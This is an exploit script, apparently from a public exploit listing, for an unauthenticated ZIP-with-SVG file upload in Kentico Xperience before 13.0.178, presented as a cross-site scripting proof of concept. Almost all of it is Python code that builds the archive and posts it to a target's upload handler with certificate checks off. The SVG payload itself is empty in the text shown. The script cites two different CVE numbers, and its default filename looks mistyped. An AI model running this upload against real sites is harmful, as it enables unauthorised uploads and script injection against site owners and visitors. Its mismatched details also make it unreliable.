# Exploit Title: Kentico Xperience 13.0.178 - Cross Site Scripting (XSS)
# Date: 2025-05-09
# Version: Kentico Xperience before 13.0.178
# Exploit Author: Alex Messham
# Contact: ramessham@gmail.com
# Source: https://github.com/xirtam2669/Kentico-Xperience-before-13.0.178---XSS-POC/
# CVE: CVE-2025-32370
import requests
import subprocess
import os
import argparse
def create_svg_payload(svg_filename: str):
print(f"[*] Writing malicious SVG to: {svg_filename}")
svg_payload = '''
'''
with open(svg_filename, 'w') as f:
f.write(svg_payload)
def zip_payload(svg_filename: str, zip_filename: str):
print(f"[*] Creating zip archive: {zip_filename}")
subprocess.run(['zip', zip_filename, svg_filename], check=True)
def upload_zip(zip_filename: str, target_url: str):
full_url = f"{target_url}?Filename={zip_filename}&Complete=false"
headers = {
"Content-Type": "application/octet-stream"
}
print(f"[+] Uploading {zip_filename} to {full_url}")
with open(zip_filename, 'rb') as f:
response = requests.post(full_url, headers=headers, data=f,
verify=False)
if response.status_code == 200:
print("[+] Upload succeeded")
else:
print(f"[-] Upload failed with status code {response.status_code}")
print(response.text)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="PoC for CVE-2025-2748 -
Unauthenticated ZIP file upload with embedded SVG for XSS.")
parser.add_argument("--url", required=True, help="Target upload URL
(e.g. https://example.com/CMSModules/.../MultiFileUploader.ashx)")
parser.add_argument("--svg", default="poc.svc", help="SVG filename to
embed inside the zip")
parser.add_argument("--zip", default="exploit.zip", help="Name of the
output zip file")
args = parser.parse_args()
create_svg_payload(args.svg)
zip_payload(args.svg, args.zip)
upload_zip(args.zip, args.url)
```